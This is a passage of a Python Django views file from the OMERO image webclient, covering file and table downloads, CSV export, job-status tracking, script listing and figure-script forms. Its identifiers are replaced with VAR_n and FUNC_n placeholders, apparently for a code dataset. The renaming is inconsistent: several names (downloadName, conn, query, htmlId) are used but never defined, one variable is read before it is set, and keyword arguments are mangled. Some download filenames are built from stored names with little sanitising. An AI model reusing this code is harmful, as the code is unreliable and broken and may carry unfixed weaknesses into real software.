"dreport": _formatReport(VAR_84),
"dtype": VAR_310,
}
if len(VAR_187) > 1:
VAR_460["delmany"] = len(VAR_187)
VAR_460["did"] = VAR_187
else:
VAR_460["delmany"] = False
VAR_460["did"] = VAR_187[0]
VAR_2.session["callback"][VAR_345(VAR_84)] = VAR_460
VAR_2.session.modified = True
except Exception:
VAR_0.error(
"Failed to delete: %r" % {"did": VAR_187, "dtype": VAR_310}, exc_info=True
)
raise
else:
VAR_361 = {"bad": "false"}
return JsonResponse(VAR_361)
VAR_53["template"] = VAR_54
return VAR_53
@login_required(doConnectionCleanup=False)
def FUNC_53(VAR_2, VAR_30, VAR_31=False, VAR_5=None, **VAR_6):
VAR_5.SERVICE_OPTS.setOmeroGroup(-1)
VAR_173 = VAR_5.getObject("OriginalFile", VAR_30)
if VAR_173 is None:
return handlerInternalError(
VAR_2, "Original File does not exist (id:%s)." % (VAR_30)
)
VAR_174 = ConnCleaningHttpResponse(VAR_173.getFileInChunks(buf=settings.CHUNK_SIZE))
VAR_174.conn = VAR_5
VAR_175 = VAR_173.mimetype
if VAR_175 == "text/x-python":
VAR_175 = "text/plain" # allows display in browser
VAR_174["Content-Type"] = VAR_175
VAR_174["Content-Length"] = VAR_173.getSize()
if VAR_31:
VAR_300 = VAR_173.name.replace(" ", "_")
VAR_300 = downloadName.replace(",", ".")
VAR_174["Content-Disposition"] = "attachment; filename=%s" % VAR_300
return VAR_174
@login_required(doConnectionCleanup=False)
@render_response()
def FUNC_54(VAR_2, VAR_32, VAR_33=None, VAR_5=None, **VAR_6):
VAR_176 = VAR_2.GET.get("query", "*")
VAR_177 = FUNC_0(VAR_2, "offset", 0)
VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
VAR_178 = None
try:
VAR_178 = VAR_350("omero_iviewer_index")
except NoReverseMatch:
pass
VAR_32 = VAR_241(VAR_32)
VAR_173 = VAR_5.getObject("OriginalFile", VAR_32)
if VAR_173 is None:
raise Http404("OriginalFile %s not found" % VAR_32)
VAR_179 = VAR_33 == "csv"
VAR_53 = webgateway_views._table_query(
VAR_2, VAR_32, VAR_5=conn, VAR_176=query, VAR_177=offset, VAR_88=limit, VAR_179=lazy
)
if VAR_53.get("error") or not VAR_53.get("data"):
return JsonResponse(VAR_53)
if VAR_33 == "csv":
VAR_301 = VAR_53.get("data")
def FUNC_87():
VAR_364 = ",".join(VAR_301.get("columns"))
yield VAR_364
for rows in VAR_301.get("lazy_rows"):
yield (
"\n" + "\n".join([",".join([VAR_345(VAR_362) for VAR_362 in VAR_378]) for VAR_378 in rows])
)
VAR_300 = VAR_173.name.replace(" ", "_").replace(",", ".")
VAR_300 = downloadName + ".csv"
VAR_174 = TableClosingHttpResponse(FUNC_87(), content_type="text/csv")
VAR_174.conn = VAR_5
VAR_174.table = VAR_53.get("table")
VAR_174["Content-Type"] = "application/force-download"
VAR_174["Content-Disposition"] = "attachment; filename=%s" % VAR_300
return VAR_174
VAR_53["data"]["name"] = VAR_173.name
VAR_53["data"]["path"] = VAR_173.path
VAR_53["data"]["id"] = VAR_32
VAR_53["meta"]["query"] = VAR_176
if VAR_177 == 0 or VAR_177 / VAR_88 == VAR_177 // VAR_88:
VAR_53["meta"]["page"] = (VAR_177 // VAR_88) + 1 if VAR_177 > 0 else 1
VAR_7 = VAR_350("omero_table", args=[VAR_32])
VAR_53["meta"]["url"] = VAR_7
VAR_7 += "?VAR_88=%s" % VAR_88
if VAR_176 != "*":
VAR_7 += "&VAR_176=%s" % VAR_176
if (VAR_177 + VAR_88) < VAR_53["meta"]["totalCount"]:
VAR_53["meta"]["next"] = VAR_7 + "&VAR_177=%s" % (VAR_177 + VAR_88)
if VAR_177 > 0:
VAR_53["meta"]["prev"] = VAR_7 + "&VAR_177=%s" % (max(0, VAR_177 - VAR_88))
if VAR_33 is None:
VAR_53["template"] = "webclient/annotations/FUNC_54.html"
VAR_53["iviewer_url"] = VAR_178
VAR_302 = VAR_53["data"]["column_types"]
if "ImageColumn" in VAR_302:
VAR_53["image_column_index"] = VAR_302.index("ImageColumn")
if "WellColumn" in VAR_302:
VAR_53["well_column_index"] = VAR_302.index("WellColumn")
if "RoiColumn" in VAR_302:
VAR_53["roi_column_index"] = VAR_302.index("RoiColumn")
for idx, VAR_23 in enumerate(VAR_302):
if VAR_23 in ("DoubleColumn", "LongColumn"):
VAR_406 = VAR_53["data"]["columns"][idx]
VAR_407 = []
for VAR_378 in VAR_53["data"]["rows"]:
if VAR_378[idx]:
VAR_407.append(VAR_378[idx])
if len(VAR_407) > 3:
break
if " " in VAR_406 or len(VAR_407) < 2:
continue
VAR_53["example_column"] = VAR_406
VAR_53["example_min_value"] = min(VAR_407)
VAR_53["example_max_value"] = max(VAR_407)
break
return VAR_53
@login_required(doConnectionCleanup=False)
def FUNC_55(VAR_2, VAR_34, VAR_5=None, **VAR_6):
VAR_180 = VAR_5.getObject("FileAnnotation", VAR_34)
if VAR_180 is None:
return handlerInternalError(
VAR_2, "FileAnnotation does not exist (id:%s)." % (VAR_34)
)
VAR_174 = ConnCleaningHttpResponse(VAR_180.getFileInChunks(buf=settings.CHUNK_SIZE))
VAR_174.conn = VAR_5
VAR_174["Content-Type"] = "application/force-download"
VAR_174["Content-Length"] = VAR_180.getFileSize()
VAR_174["Content-Disposition"] = "attachment; filename=%s" % (
VAR_180.getFileName().replace(" ", "_")
)
return VAR_174
@login_required()
def FUNC_56(VAR_2, VAR_26, VAR_5=None, **VAR_6):
VAR_142 = VAR_5.getObject("Image", VAR_26)
if VAR_142 is None:
raise Http404("No Image found with ID %s" % VAR_26)
VAR_181 = VAR_142.loadOriginalMetadata()
VAR_182 = ["[Global Metadata]"]
VAR_182.extend(["%s=%s" % (kv[0], kv[1]) for kv in VAR_181[1]])
VAR_182.append("[Series Metadata]")
VAR_182.extend(["%s=%s" % (kv[0], kv[1]) for kv in VAR_181[2]])
VAR_183 = "\n".join(VAR_182)
VAR_174 = HttpResponse(VAR_183)
VAR_174["Content-Type"] = "application/force-download"
VAR_174["Content-Length"] = len(VAR_183)
VAR_174["Content-Disposition"] = "attachment; filename=Original_Metadata.txt"
return VAR_174
@login_required()
@render_response()
def FUNC_57(VAR_2, VAR_5=None, **VAR_6):
VAR_184 = VAR_2.GET.get("format", None)
if VAR_184 is not None:
VAR_191 = VAR_350("download_as")
VAR_303 = "Export_as_%s" % VAR_184
else:
VAR_191 = VAR_350("archived_files")
VAR_303 = "OriginalFileDownload"
VAR_185 = VAR_2.GET.get("ids") # E.g. VAR_142-1|VAR_142-2
VAR_186 = VAR_2.GET.get("name", VAR_303) # VAR_4 zip VAR_3
VAR_186 = os.path.basename(VAR_186) # remove VAR_314
if VAR_185 is None:
raise Http404("No IDs specified. E.g. ?VAR_187=VAR_142-1|VAR_142-2")
VAR_187 = VAR_185.split("|")
VAR_188 = []
VAR_189 = 0
VAR_190 = 0
if VAR_184 is None:
VAR_304 = []
VAR_214 = []
for VAR_318 in VAR_187:
if VAR_318.split("-")[0] == "image":
VAR_304.append(VAR_318.split("-")[1])
elif VAR_318.split("-")[0] == "well":
VAR_214.append(VAR_318.split("-")[1])
VAR_106 = []
if VAR_304:
VAR_106 = list(VAR_5.getObjects("Image", VAR_304))
if len(VAR_106) == 0:
raise Http404("No VAR_106 found.")
VAR_305 = set()
VAR_306 = set()
for VAR_142 in VAR_106:
VAR_365 = VAR_142.getFileset()
if VAR_365 is not None:
if VAR_365.id in VAR_305:
continue
VAR_305.add(VAR_365.id)
VAR_284 = list(VAR_142.getImportedImageFiles())
VAR_366 = []
for f in VAR_284:
if f.id in VAR_306:
continue
VAR_306.add(f.id)
VAR_366.append({"id": f.id, "name": f.name, "size": f.getSize()})
VAR_190 += f.getSize()
if len(VAR_366) > 0:
VAR_188.append(VAR_366)
VAR_189 = sum([len(VAR_366) for VAR_366 in VAR_188])
else:
VAR_189 = len(VAR_187)
VAR_176 = "&".join([_id.replace("-", "=") for _id in VAR_187])
VAR_191 = download_url + "?" + VAR_176
if VAR_184 is not None:
VAR_191 = download_url + "&VAR_184=%s" % VAR_184
VAR_53 = {
"template": "webclient/annotations/FUNC_57.html",
"url": VAR_191,
"defaultName": VAR_186,
"fileLists": VAR_188,
"fileCount": VAR_189,
"filesTotalSize": VAR_190,
}
if VAR_190 > settings.MAXIMUM_MULTIFILE_DOWNLOAD_ZIP_SIZE:
VAR_53["downloadTooLarge"] = settings.MAXIMUM_MULTIFILE_DOWNLOAD_ZIP_SIZE
return VAR_53
@login_required(setGroupContext=True)
@render_response()
def FUNC_58(VAR_2, VAR_35=None, VAR_36=None, VAR_5=None, **VAR_6):
VAR_54 = "webclient/history/calendar.html"
VAR_192 = VAR_2.session.get("user_id")
if VAR_35 is not None and VAR_36 is not None:
VAR_193 = BaseCalendar(VAR_5=conn, VAR_35=year, VAR_36=month, eid=VAR_192)
else:
VAR_307 = datetime.datetime.today()
VAR_193 = BaseCalendar(
VAR_5=conn, VAR_35=VAR_307.year, VAR_36=VAR_307.month, eid=VAR_192
)
VAR_193.create_calendar()
VAR_53 = {"controller": VAR_193}
VAR_53["template"] = VAR_54
return VAR_53
@login_required(setGroupContext=True)
@render_response()
def FUNC_59(VAR_2, VAR_35, VAR_36, VAR_37, VAR_5=None, **VAR_6):
if VAR_35 is None or VAR_36 is None or VAR_37 is None:
raise Http404("Year, VAR_36, and VAR_37 are required")
VAR_54 = "webclient/history/history_details.html"
VAR_87 = int(VAR_2.GET.get("page", 1))
VAR_192 = VAR_2.session.get("user_id")
VAR_193 = BaseCalendar(
VAR_5=conn, VAR_35=year, VAR_36=month, VAR_37=day, eid=VAR_192
)
VAR_193.get_items(VAR_87)
VAR_53 = {"controller": VAR_193}
VAR_53["template"] = VAR_54
return VAR_53
def FUNC_60(VAR_5, VAR_38):
VAR_194 = VAR_350(viewname="load_template", args=["userdata"])
if isinstance(VAR_38, omero.model.FileAnnotationI):
VAR_308 = VAR_5.getObject("Annotation", VAR_38.id.val)
for VAR_255 in ["project", "dataset", "image"]:
VAR_240 = list(VAR_308.getParentLinks(VAR_255))
if len(VAR_240) > 0:
VAR_38 = VAR_240[0].parent
break
if VAR_38.__class__.__name__ in (
"ImageI",
"DatasetI",
"ProjectI",
"ScreenI",
"PlateI",
"WellI",
):
VAR_309 = VAR_38.__class__.__name__[:-1].lower()
VAR_194 += "?VAR_59=%s-%s" % (VAR_309, VAR_38.id.val)
return VAR_194
def FUNC_61(VAR_2, VAR_39, **VAR_6):
for VAR_310, VAR_375 in VAR_6.items():
VAR_2.session["callback"][VAR_39][VAR_310] = VAR_375
@login_required()
@render_response()
def FUNC_62(VAR_2, VAR_5=None, **VAR_6):
VAR_195 = 0
VAR_196 = 0
VAR_197 = []
_purgeCallback(VAR_2)
VAR_198 = VAR_2.GET.get("jobId", None)
if VAR_198 is not None:
VAR_198 = VAR_345(VAR_198)
try:
VAR_367 = omero.cmd.HandlePrx.checkedCast(VAR_5.c.ic.stringToProxy(VAR_198))
VAR_313 = VAR_367.getStatus()
VAR_0.debug("job VAR_313: %s", VAR_313)
VAR_174 = VAR_367.getResponse()
if VAR_174 is not None:
VAR_172 = graphResponseMarshal(VAR_5, VAR_174)
VAR_172["finished"] = True
else:
VAR_172 = {"finished": False}
VAR_172["status"] = {
"currentStep": VAR_313.currentStep,
"steps": VAR_313.steps,
"startTime": VAR_313.startTime,
"stopTime": VAR_313.stopTime,
}
except IceException:
VAR_172 = {"finished": True}
return VAR_172
elif VAR_2.method == "DELETE":
try:
VAR_17 = json.loads(VAR_2.body)
except TypeError:
VAR_17 = json.loads(bytes_to_native_str(VAR_2.body))
VAR_198 = VAR_17.get("jobId", None)
if VAR_198 is not None:
VAR_198 = VAR_345(VAR_198)
VAR_172 = {"jobId": VAR_198}
try:
VAR_367 = omero.cmd.HandlePrx.checkedCast(VAR_5.c.ic.stringToProxy(VAR_198))
VAR_313 = VAR_367.getStatus()
VAR_0.debug("pre-cancel() job VAR_313: %s", VAR_313)
VAR_172["status"] = {
"currentStep": VAR_313.currentStep,
"steps": VAR_313.steps,
"startTime": VAR_313.startTime,
"stopTime": VAR_313.stopTime,
}
VAR_367.cancel()
except omero.LockTimeout:
VAR_0.info("Timeout on VAR_367.cancel()")
return VAR_172
for VAR_39 in VAR_2.session.get("callback").keys():
VAR_311 = VAR_2.session["callback"][VAR_39]
VAR_312 = VAR_311["job_type"]
VAR_313 = VAR_311["status"]
if VAR_313 == "failed":
VAR_196 += 1
VAR_2.session.modified = True
if VAR_312 in ("chgrp", "chown"):
if VAR_313 not in ("failed", "finished"):
VAR_174 = None
try:
VAR_367 = omero.cmd.HandlePrx.checkedCast(
VAR_5.c.ic.stringToProxy(VAR_39)
)
VAR_174 = VAR_367.getResponse()
VAR_431 = False
try:
if VAR_174 is not None:
VAR_431 = True
VAR_197.append(VAR_39)
if isinstance(VAR_174, omero.cmd.ERR):
VAR_448 = ", ".join(
[
"%s: %s" % (VAR_415, VAR_416)
for VAR_415, VAR_416 in VAR_174.parameters.items()
]
)
VAR_0.error(
"%s failed with: %s" % (VAR_312, VAR_448)
)
FUNC_61(
VAR_2,
VAR_39,
VAR_313="failed",
report="%s %s" % (VAR_174.name, VAR_448),
VAR_57=1,
)
elif isinstance(VAR_174, omero.cmd.OK):
FUNC_61(VAR_2, VAR_39, VAR_313="finished")
else:
VAR_195 += 1
finally:
VAR_367.close(VAR_431)
except Exception:
VAR_0.info(
"Activities %s VAR_84 not found: %s" % (VAR_312, VAR_39)
)
continue
elif VAR_312 == "send_email":
if VAR_313 not in ("failed", "finished"):
VAR_174 = None
try:
VAR_367 = omero.cmd.HandlePrx.checkedCast(
VAR_5.c.ic.stringToProxy(VAR_39)
)
VAR_445 = omero.callbacks.CmdCallbackI(
VAR_5.c, VAR_367, foreground_poll=True
)
VAR_174 = VAR_445.getResponse()
VAR_431 = False
try:
if VAR_174 is not None:
VAR_431 = True
VAR_197.append(VAR_39)
if isinstance(VAR_174, omero.cmd.ERR):
VAR_448 = ", ".join(
[
"%s: %s" % (VAR_415, VAR_416)
for VAR_415, VAR_416 in VAR_174.parameters.items()
]
)
VAR_0.error("send_email failed with: %s" % VAR_448)
FUNC_61(
VAR_2,
VAR_39,
VAR_313="failed",
report={"error": VAR_448},
VAR_57=1,
)
else:
VAR_451 = (
VAR_174.success
+ len(VAR_174.invalidusers)
+ len(VAR_174.invalidemails)
)
FUNC_61(
VAR_2,
VAR_39,
VAR_313="finished",
VAR_174={"success": VAR_174.success, "total": VAR_451},
)
if (
len(VAR_174.invalidusers) > 0
or len(VAR_174.invalidemails) > 0
):
VAR_454 = [
e.getFullName()
for e in list(
VAR_5.getObjects(
"Experimenter", VAR_174.invalidusers
)
)
]
FUNC_61(
VAR_2,
VAR_39,
report={
"invalidusers": VAR_454,
"invalidemails": VAR_174.invalidemails,
},
)
else:
VAR_195 += 1
finally:
VAR_445.close(VAR_431)
except Exception:
VAR_0.error(traceback.format_exc())
VAR_0.info("Activities send_email VAR_84 not found: %s" % VAR_39)
elif VAR_312 == "delete":
if VAR_313 not in ("failed", "finished"):
try:
VAR_84 = omero.cmd.HandlePrx.checkedCast(
VAR_5.c.ic.stringToProxy(VAR_39)
)
VAR_446 = omero.callbacks.CmdCallbackI(
VAR_5.c, VAR_84, foreground_poll=True
)
VAR_174 = VAR_446.getResponse()
VAR_431 = False
try:
if not VAR_174: # Response not available
FUNC_61(
VAR_2,
VAR_39,
VAR_57=0,
VAR_313="in progress",
dreport=_formatReport(VAR_84),
)
VAR_195 += 1
else: # Response available
VAR_431 = True
VAR_197.append(VAR_39)
VAR_174 = VAR_446.getResponse()
VAR_452 = isinstance(VAR_174, omero.cmd.ERR)
if VAR_452:
FUNC_61(
VAR_2,
VAR_39,
VAR_57=1,
VAR_313="failed",
dreport=_formatReport(VAR_84),
)
VAR_196 += 1
else:
FUNC_61(
VAR_2,
VAR_39,
VAR_57=0,
VAR_313="finished",
dreport=_formatReport(VAR_84),
)
finally:
VAR_446.close(VAR_431)
except Ice.ObjectNotExistException:
FUNC_61(
VAR_2, VAR_39, VAR_57=0, VAR_313="finished", dreport=None
)
except Exception as x:
VAR_0.error(traceback.format_exc())
VAR_0.error("Status job '%s'error:" % VAR_39)
FUNC_61(
VAR_2, VAR_39, VAR_57=1, VAR_313="failed", dreport=VAR_345(x)
)
VAR_196 += 1
elif VAR_312 == "script":
if not VAR_39.startswith("ProcessCallback"):
continue # ignore
if VAR_313 not in ("failed", "finished"):
VAR_0.info("Check VAR_445 on script: %s" % VAR_39)
try:
VAR_449 = omero.grid.ScriptProcessPrx.checkedCast(
VAR_5.c.ic.stringToProxy(VAR_39)
)
except IceException:
FUNC_61(
VAR_2,
VAR_39,
VAR_313="failed",
Message="No process found for job",
VAR_57=1,
)
continue
VAR_446 = omero.scripts.ProcessCallbackI(VAR_5.c, VAR_449)
if VAR_446.block(0): # ms.
VAR_446.close()
try:
VAR_453 = VAR_449.getResults(0, VAR_5.SERVICE_OPTS)
FUNC_61(VAR_2, VAR_39, VAR_313="finished")
VAR_197.append(VAR_39)
except Exception:
FUNC_61(
VAR_2,
VAR_39,
VAR_313="finished",
Message="Failed to FUNC_80 results",
)
VAR_0.info("Failed on VAR_449.getResults() for OMERO.script")
continue
VAR_450 = {}
for VAR_310, VAR_375 in VAR_453.items():
VAR_416 = VAR_375.getValue()
if VAR_310 in ("stdout", "stderr", "Message"):
if VAR_310 in ("stderr", "stdout"):
VAR_416 = VAR_416.id.val
VAR_455 = {VAR_310: VAR_416}
FUNC_61(VAR_2, VAR_39, **VAR_455)
else:
if hasattr(VAR_416, "id"):
VAR_456 = {
"id": VAR_416.id.val,
"type": VAR_416.__class__.__name__[:-1],
}
VAR_456["browse_url"] = FUNC_60(VAR_5, VAR_416)
if VAR_416.isLoaded() and hasattr(VAR_416, "file"):
VAR_458 = {
"image/png": "png",
"image/jpeg": "jpeg",
"text/plain": "text",
}
if VAR_416.file.mimetype.val in VAR_458:
VAR_456["fileType"] = VAR_458[
VAR_416.file.mimetype.val
]
VAR_456["fileId"] = VAR_416.file.id.val
VAR_456["name"] = VAR_416.file.name.val
if VAR_416.isLoaded() and hasattr(VAR_416, "name"):
VAR_3 = unwrap(VAR_416.name)
if VAR_3 is not None:
VAR_456["name"] = VAR_3
VAR_450[VAR_310] = VAR_456
else:
VAR_450[VAR_310] = unwrap(VAR_416)
FUNC_61(VAR_2, VAR_39, VAR_453=VAR_450)
else:
VAR_195 += 1
VAR_172 = {}
for VAR_39 in VAR_2.session.get("callback").keys():
VAR_172[VAR_39] = copy.copy(VAR_2.session["callback"][VAR_39])
if "template" in VAR_6 and VAR_6["template"] == "json":
for VAR_39 in VAR_2.session.get("callback").keys():
VAR_172[VAR_39]["start_time"] = VAR_345(
VAR_2.session["callback"][VAR_39]["start_time"]
)
VAR_172["inprogress"] = VAR_195
VAR_172["failure"] = VAR_196
VAR_172["jobs"] = len(VAR_2.session["callback"])
return JsonResponse(VAR_172) # json
VAR_199 = []
VAR_200 = False
for VAR_310, VAR_158 in VAR_172.items():
if len(VAR_310.split(" ")) > 0:
VAR_368 = VAR_310.split(" ")[0]
if len(VAR_368.split("/")) > 1:
VAR_368 = htmlId.split("/")[1]
VAR_172[VAR_310]["id"] = VAR_368
VAR_172[VAR_310]["key"] = VAR_310
if VAR_310 in VAR_197:
VAR_172[VAR_310]["new"] = True
if "error" in VAR_158 and VAR_158["error"] > 0:
VAR_200 = True
VAR_199.append(VAR_172[VAR_310])
VAR_199.sort(VAR_310=lambda x: x["start_time"], VAR_350=True)
VAR_53 = {
"sizeOfJobs": len(VAR_2.session["callback"]),
"jobs": VAR_199,
"inprogress": VAR_195,
"new_results": len(VAR_197),
"new_errors": VAR_200,
"failure": VAR_196,
}
VAR_53["template"] = "webclient/FUNC_62/activitiesContent.html"
return VAR_53
@login_required()
def FUNC_63(VAR_2, VAR_27, **VAR_6):
VAR_2.session.modified = True
if VAR_27 == "clean":
if "jobKey" in VAR_2.POST:
VAR_198 = VAR_2.POST.get("jobKey")
VAR_172 = {}
if VAR_198 in VAR_2.session["callback"]:
del VAR_2.session["callback"][VAR_198]
VAR_2.session.modified = True
VAR_172["removed"] = True
else:
VAR_172["removed"] = False
return JsonResponse(VAR_172)
else:
VAR_199 = list(VAR_2.session["callback"].items())
for VAR_310, VAR_158 in VAR_199:
if VAR_158["status"] != "in progress":
del VAR_2.session["callback"][VAR_310]
return HttpResponse("OK")
@login_required()
def FUNC_64(VAR_2, VAR_40=None, VAR_5=None, **VAR_6):
VAR_201 = VAR_5.getExperimenterPhoto(VAR_40)
return HttpResponse(VAR_201, content_type="image/jpeg")
@login_required()
def FUNC_65(VAR_2, VAR_41, VAR_25=None, **VAR_6):
VAR_6["viewport_server"] = (
VAR_25 is not None and VAR_350("webindex") + VAR_25 or VAR_350("webindex")
)
VAR_6["viewport_server"] = VAR_6["viewport_server"].rstrip("/")
return webgateway_views.full_viewer(VAR_2, VAR_41, **VAR_6)
@login_required()
@render_response()
def FUNC_66(VAR_2, VAR_5=None, **VAR_6):
VAR_202 = VAR_5.getScriptService()
VAR_203 = VAR_202.getScripts()
VAR_204 = {}
VAR_205 = (
VAR_2.session.get("server_settings", {})
.get("scripts_to_ignore", "")
.split(",")
)
for s in VAR_203:
VAR_42 = s.id.val
VAR_314 = s.path.val
VAR_3 = s.name.val
VAR_315 = os.path.join(VAR_314, VAR_3)
if VAR_315 in VAR_205:
VAR_0.info("Ignoring script %r" % VAR_315)
continue
ul = VAR_204
VAR_316 = VAR_315.split(os.path.sep)
for li, VAR_362 in enumerate(VAR_316):
if len(VAR_362) == 0:
continue
if VAR_362 not in VAR_206:
if li + 1 == len(VAR_316):
VAR_206[VAR_362] = VAR_42
else:
VAR_206[VAR_362] = {}
VAR_206 = ul[VAR_362]
def FUNC_84(VAR_206):
VAR_317 = []
for VAR_3, VAR_375 in VAR_206.items():
if isinstance(VAR_375, dict):
VAR_317.append({"name": VAR_3, "ul": FUNC_84(VAR_375)})
else:
VAR_317.append({"name": VAR_3, "id": VAR_375})
VAR_317.sort(VAR_310=lambda x: x["name"].lower())
return VAR_317
VAR_207 = FUNC_84(VAR_204)
if not VAR_2.GET.get("full_path") and len(VAR_207) == 1:
VAR_207 = scriptList[0]["ul"]
return VAR_207
@login_required()
@render_response()
def FUNC_67(VAR_2, VAR_42, VAR_5=None, **VAR_6):
VAR_202 = VAR_5.getScriptService()
try:
VAR_73 = VAR_202.getParams(VAR_241(VAR_42))
except Exception as ex:
if ex.message.lower().startswith("no processor available"):
return {
"template": "webclient/VAR_203/no_processor.html",
"scriptId": VAR_42,
}
raise ex
if VAR_73 is None:
return HttpResponse()
VAR_208 = {}
VAR_208["id"] = VAR_241(VAR_42)
VAR_208["name"] = VAR_73.name.replace("_", " ")
VAR_208["description"] = VAR_73.description
VAR_208["authors"] = ", ".join([a for a in VAR_73.authors])
VAR_208["contact"] = VAR_73.contact
VAR_208["version"] = VAR_73.version
VAR_208["institutions"] = ", ".join([VAR_318 for VAR_318 in VAR_73.institutions])
VAR_209 = [] # use a list so we can sort by 'grouping'
VAR_210 = None
VAR_211 = None
for VAR_310, VAR_320 in VAR_73.inputs.items():
VAR_318 = {}
VAR_318["name"] = VAR_310.replace("_", " ")
VAR_318["key"] = VAR_310
if not VAR_320.optional:
VAR_318["required"] = True
VAR_318["description"] = VAR_320.description
if VAR_320.min:
VAR_318["min"] = VAR_345(VAR_320.min.getValue())
if VAR_320.max:
VAR_318["max"] = VAR_345(VAR_320.max.getValue())
if VAR_320.values:
VAR_318["options"] = [VAR_416.getValue() for VAR_416 in VAR_320.values.getValue()]
if VAR_320.useDefault:
VAR_318["default"] = unwrap(VAR_320.prototype)
if isinstance(VAR_318["default"], omero.model.IObject):
VAR_318["default"] = None
VAR_319 = unwrap(VAR_320.prototype)
if VAR_319.__class__.__name__ == "dict":
VAR_318["map"] = True
elif VAR_319.__class__.__name__ == "list":
VAR_318["list"] = True
if "default" in VAR_318:
VAR_318["default"] = ",".join([VAR_345(VAR_362) for VAR_362 in VAR_318["default"]])
elif isinstance(VAR_319, bool):
VAR_318["boolean"] = True
elif isinstance(VAR_319, int) or isinstance(VAR_319, VAR_241):
VAR_318["number"] = "number"
elif isinstance(VAR_319, float):
VAR_318["number"] = "float"
if VAR_2.GET.get(VAR_310, None) is not None:
VAR_318["default"] = VAR_2.GET.get(VAR_310, None)
VAR_318["prototype"] = unwrap(VAR_320.prototype)
VAR_318["grouping"] = VAR_320.grouping
VAR_209.append(VAR_318)
if VAR_310 == "IDs":
VAR_211 = VAR_318 # remember these...
if VAR_310 == "Data_Type":
VAR_210 = VAR_318
VAR_209.sort(VAR_310=lambda VAR_318: VAR_318["grouping"])
if (
VAR_210 is not None
and VAR_211 is not None
and "options" in VAR_210
):
VAR_211["default"] = ""
for VAR_215 in VAR_210["options"]:
if VAR_2.GET.get(VAR_215, None) is not None:
VAR_210["default"] = VAR_215
VAR_211["default"] = VAR_2.GET.get(VAR_215, "")
break # only use the first match
if len(VAR_211["default"]) == 0 and VAR_2.GET.get("Well", None) is not None:
if "Image" in VAR_210["options"]:
VAR_214 = [VAR_241(j) for j in VAR_2.GET.get("Well", None).split(",")]
VAR_322 = 0
try:
VAR_322 = int(VAR_2.GET.get("Index", 0))
except Exception:
pass
VAR_113 = VAR_5.getObjects("Well", VAR_214)
VAR_304 = [VAR_345(w.getImage(VAR_322).getId()) for w in VAR_113]
VAR_210["default"] = "Image"
VAR_211["default"] = ",".join(VAR_304)
for VAR_318 in range(len(VAR_209)):
if len(VAR_209) <= VAR_318:
break
VAR_320 = VAR_209[VAR_318]
VAR_321 = VAR_320["grouping"] # E.g 03
VAR_320["children"] = list()
while len(VAR_209) > VAR_318 + 1:
VAR_369 = VAR_209[VAR_318 + 1]["grouping"] # E.g. 03.1
if VAR_369.split(".")[0] == VAR_321:
VAR_320["children"].append(VAR_209[VAR_318 + 1])
VAR_209.pop(VAR_318 + 1)
else:
break
VAR_208["inputs"] = VAR_209
return {
"template": "webclient/VAR_203/FUNC_67.html",
"paramData": VAR_208,
"scriptId": VAR_42,
}
@login_required()
@render_response()
def FUNC_68(VAR_2, VAR_43, VAR_5=None, **VAR_6):
VAR_212 = VAR_2.GET.get("Image", None) # comma - delimited list
VAR_213 = VAR_2.GET.get("Dataset", None)
VAR_214 = VAR_2.GET.get("Well", None)
if VAR_214 is not None:
VAR_214 = [VAR_241(VAR_318) for VAR_318 in VAR_214.split(",")]
VAR_113 = VAR_5.getObjects("Well", VAR_214)
VAR_322 = getIntOrDefault(VAR_2, "Index", 0)
VAR_212 = [VAR_345(w.getImage(VAR_322).getId()) for w in VAR_113]
VAR_212 = ",".join(VAR_212)
if VAR_212 is None and VAR_213 is None:
return HttpResponse(
"Need to specify /?Image=1,2 or /?Dataset=1,2 or /?Well=1,2"
)
def FUNC_85(VAR_215, VAR_187):
VAR_323 = [int(VAR_40) for VAR_40 in VAR_187.split(",")]
VAR_324 = {}
for VAR_38 in VAR_5.getObjects(VAR_215, VAR_323):
VAR_324[VAR_38.id] = VAR_38
VAR_325 = [VAR_41 for VAR_41 in VAR_323 if VAR_41 in VAR_324.keys()]
if len(VAR_325) == 0:
raise Http404("No %ss found with IDs %s" % (VAR_215, VAR_187))
else:
VAR_335 = list(VAR_324.values())[0].getDetails().group.id.val
VAR_5.SERVICE_OPTS.setOmeroGroup(VAR_335)
return VAR_325, VAR_324
VAR_53 = {}
if VAR_212 is not None:
VAR_212, VAR_326 = FUNC_85("Image", VAR_212)
VAR_53["idString"] = ",".join([VAR_345(VAR_318) for VAR_318 in VAR_212])
VAR_53["dtype"] = "Image"
if VAR_213 is not None:
VAR_213, VAR_327 = FUNC_85("Dataset", VAR_213)
VAR_53["idString"] = ",".join([VAR_345(VAR_318) for VAR_318 in VAR_213])
VAR_53["dtype"] = "Dataset"
if VAR_43 == "SplitView":
VAR_328 = "/omero/figure_scripts/Split_View_Figure.py"
VAR_54 = "webclient/VAR_203/split_view_figure.html"
VAR_329 = [] # A list of VAR_158 about each VAR_142.
for VAR_432 in VAR_212:
VAR_158 = {"id": VAR_432}
VAR_370 = VAR_326[VAR_432]
VAR_158["name"] = VAR_370.getName()
VAR_164 = [
VAR_180.getTextValue()
for VAR_180 in VAR_370.listAnnotations()
if VAR_180._obj.__class__ == omero.model.TagAnnotationI
]
VAR_158["tags"] = VAR_164
VAR_158["datasets"] = [VAR_362.getName() for VAR_362 in VAR_370.listParents()]
VAR_329.append(VAR_158)
VAR_142 = VAR_326[VAR_212[0]]
VAR_53["imgDict"] = VAR_329
VAR_53["image"] = VAR_142
VAR_53["channels"] = VAR_142.getChannels()
elif VAR_43 == "Thumbnail":
VAR_328 = "/omero/figure_scripts/Thumbnail_Figure.py"
VAR_54 = "webclient/VAR_203/thumbnail_figure.html"
def FUNC_88(VAR_212):
VAR_408 = VAR_5.getAnnotationLinks("Image", parent_ids=VAR_212)
VAR_409 = {} # VAR_101 VAR_164. {VAR_26: [VAR_164]}
VAR_410 = {}
for VAR_432 in VAR_212:
VAR_409[VAR_432] = []
for VAR_344 in VAR_408:
VAR_383 = VAR_344.getChild()
if VAR_383._obj.__class__ == omero.model.TagAnnotationI:
VAR_410[VAR_383.id] = VAR_383
VAR_409[VAR_344.getParent().id].append(VAR_383)
VAR_411 = []
for VAR_432 in VAR_212:
VAR_411.append({"id": VAR_432, "tags": VAR_409[VAR_432]})
VAR_164 = []
for tId, VAR_433 in VAR_410.items():
VAR_164.append(VAR_433)
return VAR_411, VAR_164
VAR_371 = [] # multiple collections of VAR_106
VAR_164 = []
VAR_372 = "Thumbnail_Figure"
if VAR_213 is not None:
for VAR_362 in VAR_5.getObjects("Dataset", VAR_213):
